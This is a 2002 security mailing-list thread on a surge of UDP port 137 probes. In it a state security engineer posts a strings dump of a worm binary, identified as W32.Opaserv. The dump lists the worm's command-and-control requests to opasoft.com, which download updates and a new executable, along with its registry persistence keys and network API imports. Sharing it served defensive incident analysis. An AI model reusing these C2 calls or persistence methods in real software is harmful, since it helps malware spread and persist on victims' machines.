|
Security Incidents
mailing list archives
RE: Unusual volume: UDP:137 probes
From: Richard.Grant () mail state ky us
Date: Tue, 1 Oct 2002 09:44:29 -0400
We had some internal machines that were contributing to the netbios flood
attack. These machines were sniffed and from that we found a file on the
identified machines named scrsvr.exe. The file was reversed engineered and
the results are listed below. While some are attributing the netbios
activity to Bugbear () mm it does not follow what we were seeing. It is known
as W32.Opaserv.Worm. Comments?
ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Wind
ows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Interne
t
Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat
.ScrSout.dat.scrupd.exe.www.opasoft.com.GET
http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0
HTTP/1.1..Host: www.opasoft.com.....GET
http://www.opasoft.com/work/lastver HTTP/1.1..Host:
www.opasoft.com.....GET http://www.opasoft.com/work/scrsvr.exe
HTTP/1.1..Host: www.opasoft.com.....POST
http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&;
cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0
HTTP/1.1..Host: www.opasoft.com.....
OK.PLAIN.CIPHER1.KEY....................................................
.................WINDOWS\scrsvr.exe..WINDOWS\win.ini.c:\tmp.ini.c:\windo
ws\scrsvr.exe.,.windows.run..........................................
CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..!..LOCALHOST
X..wO...?..................?......- () *@..* () *@..* () *@..* () +@..+ () &+@
.5+ () D+@.S+ () b+@.q+ () +@..+ () +@..+ () +@..+ () +@..,@..,@.
,@./,@.I,@.X,@..O......:.l.Y..xO....i!....~:.V.....o.8N.p!...[...z..O..[
..l.5......c4.Z...~.K/..jM...8.....[..|}..5.o...'.\..N..o....}...5.\'.N.
.B.t..a.P?.....K(....r....Yj4.......,i...=N.{S....\)..:{.A....mM.+.....>
..|R.h..K...4z...`..R.,./.Hj.....6.P..rr.N....-.l...5V..................
.......
.......91)!....:2*"....;3+#....<4,$?7/'....>6.&....=5-%.................
.............................
!"#$%&'()*+,-./012345678.........................................)4.%/7.
..(3-!0..,1'8"5...*2$. ..
.KERNEL32.dll.ADVAPI32.dll.USER32.dll.WS2_32.dll...LocalAlloc....GetCurr
entProcess...ExitThread..d.SetFilePointer..
.ResetEvent....ReadFile..H.CreateMutexA....LocalFree...GetModuleFileName
A..p.SetPriorityClass..[.SetEndOfFile....GetModuleHandleA....RegisterSer
viceProcess../.GetPrivateProfileStringA..3.GetProcAddress....ExitProcess
.4.CopyFileA...LocalReAlloc..M.CreateProcessA..'.CloseHandle...WaitForSi
ngleObject...Sleep.T.CreateThread.. () CreateFileA GetLastError V SetCu
rrentDirectoryA.._.DeleteFileA...GetFileSize...WriteFile...WritePrivateP
rofileStringA....lstrcat...lstrcmpi....lstrlen.t.GetWindowsDirectoryA...
.RegSetValueExA....RegQueryValueExA....RegOpenKeyExA...RegDeleteValueA..
.RegCloseKey...PeekMessageA....DispatchMessageA..`.TranslateMessage..j.s
ocket..f.send..d.recvfrom..c.recv..].inet_addr.S.gethostname.R.gethostby
name.P.connect.O.closesocket.N.bind..?.WSAStartup..g.sendto....WSAGetLas
tError...WSAEventSelect....WSAEnumNetworkEvents....WSACreateEvent....WSA
CloseEvent.......
.0*040.0.0.0.0.0.0.0.0.1
1'191E1a1.1.1.1.1.1.1.1.1.1.2.2!2&2L2U2j2.2.2.2.2.2.2.3.3
3.0.0j1.2V4o4v4.4.4.4.4.515k5.5.516.9.:9:.:.:.:.;.;.;.;$;.;8;?;O;h;~;.;.
;.;.<.<(<-<><R<d<y<.<.<.<.<,=T=c=.=.=M>s>~>.>.>.>.>.>.>.>.?.?"?a?q?.?...
..
..l....2:4.4.4.6.6.606H6Y6j6p6u6.6.6.6.6.6)757~7.7.7.7.7.7.7.7.7.8-868Q8
]8x8.8.8.8.8.8.8.8.8.9.9&919F9O9Z9o9x9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:
1:<:S:u:.:.:.:.;1<t<|<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=!=)=1=9=A=I=
V=^=f=n=v=~=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>$>,>4>;>A>F>N>j>x>.>.>.>
.>.>.>.>.>.>.>.>.>.>.>.?"?0?>?F?Y?f?t?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?..
...0..X....0.0.0.0"0(0-050Q0_0m0x0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1(161A1
L1V1d1l1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2"2*20262<2D2I2Q2W2]2c2{2
.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3$3.343<3H3N3T3\3j3r3z3.3.3.3.3.3.3.3.3.3
.3.3.3.3.3.3.3.3.4.4.4.4%4-454=4E4M4U4[4a4g4o4t4|4.4.4.4.4.4.4.4.4.4.4.4
.4.4.4.5.5$5*50585 () 5F5L5R5X5]5e5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 6 6 6 6 6)6
1696A6I6Q6Y6a6i6q6y6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7%7-747:7
B7K7S7[7a7f7l7v7~7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8.8.8&8,848:8E8
I8P8X8`8h8p8x8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9%9+91969>9Z9f9r9x9.9.9.9
.9.9.9.9.9.9.9.9.:.:.:.:.:::F:R:X:o:u:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.;&;2;
8;O;U;[;a;f;n;.;.;.;.;.;.;.;.;.;.;.;.<.<.</<5<;<A<F<N<j<v<.<.<.<.<.<.<.<
.<.<.<.<.<.<.=.=.=
=(=0=7=D=P=^=u={=.=.=.=.=.=.=.=.=.=.=.>.>.>.><>J>R>k>s>{>.>.>.>.>.>.>.>.
.>.>.?.?.?.?<?J?R?k?s?{?.?.?.?.?.?.?.?.?.?.?... () t 0 0 0 0<0J0R0k0s
0{0.0.0.0.0.0.0.0.0.0.0.1.1.1.1<1J1R1k1s1{1.1.1.1.1.1.1.1.1.1.1.2.2.2*26
2>2I2R2Y2f2l2t2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3%333<3D3W3e3m3s3}3.3.3.3.
3.3.3.3.3.3.3.3.3.3.4.4.4!4'4;4B4J4R4X4`4|4.4.4.4.4.4.4.4.4.4.4.4.5.5.5.
5&5B5P5^5f5.5.5.5.5.5.5.5.5.5.5.5.5.6!6+636;6A6P6l6w6}6.6.6.6.6.6.6.6.6.
6.6.6.7.7.7.7"7*797G7Q7]7d7i7o7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8!8/8=8E8V
8\8b8h8p8x8.8.8.8.8.8.8.8.8.8.8.9.9"9(9.949:9G9O9k9w9.9.9.9.9.9.9.9.9.9.
9.:.:.:.:.:.:.;.;.;.;-;P;_;h;n;w;.;.;.;.;.;.;.;.<-<P<V<\<b<h<n<t<z<.<.<.
<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.="=(=.=4=:= () =F=L=R=X=^=d
=j=p=v=|=.=.=.=.=.=.=.=.=...P..p....3.3.3.3.4.4.4.4.4.4.4.4
4$4(4,4044484<4 () 4D4H4L4P4T4X4\4 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?.?.?...`..L....0.0.0.0.0.0.0
0$0(0,00080<0 () 0D0H0L0P0X0\0`0d0h0l0p0x0|0.0.0.0.0.0..................
Richard Grant [CNA, GSEC]
Security Engineer
Governor's Office for Technology
Commonwealth of Kentucky
Phone: 502-564-5792
Fax: 502.564.6856
richard.grant () mail state ky us
Web: http://www.state.ky.us/got/ois/security/security.html
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
for the sole use of the intended recipient(s) and may contain confidential
and privileged information. Any unauthorized review, use, disclosure or
distribution is prohibited. If you are not the intended recipient, please
contact the sender by reply e-mail and destroy all copies of the original
message.
-----Original Message-----
From: Emeric Miszti [mailto:emeric () uksecurityonline com]
Sent: Monday, September 30, 2002 11:55 AM
To: incidents () securityfocus com
Subject: Re: Unusual volume: UDP:137 probes
On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote:
On Monday, September 30, 2002 9:02 AM, John Sage
[SMTP:jsage () finchhaven com] wrote:
This has received some mention on the UNISOG list and elsewhere, but
not here.
Some people have been seeing unusually high volumes of UDP:137 probes
since about 09/27/02 late, or early 09/28/02.
A few people (who log sych things) on the Optus cable network in Australia
have been seeing it too.
In my case since Sep 20 it's gone ...
Sep 20 2 hits
Sep 21, 22, 23 0 hits
Sep 24 3 hits
Sep 25 0 hits
Sep 26 4 hits
Sep 27 2 hits
Sep 28 156 hits Starting at 02:20 (Aust. EST)
Sep 29 410 hits
Sep 30 406 hits up until 18:24
Been seeing exactly the same spike with same patterns. Up from 40 odd scans
on
28/9/2002 to 495 already today.
Incidents.org have picked this up at the Internet Storm Center
http://isc.incidents.org/port_details.html?port=137
No explanations or reasons been given by anyone yet.
--
Emeric Miszti
UK Security Online
http://www.uksecurityonline.com
Tel No: 0870 088 5689
Fax No: 0870 706 2162
PGP Public Key available at
http://www.uksecurityonline.com/emeric.asc
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Inbound message certified virus free.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
 By Date 
By Thread
Current thread:
|
Intro
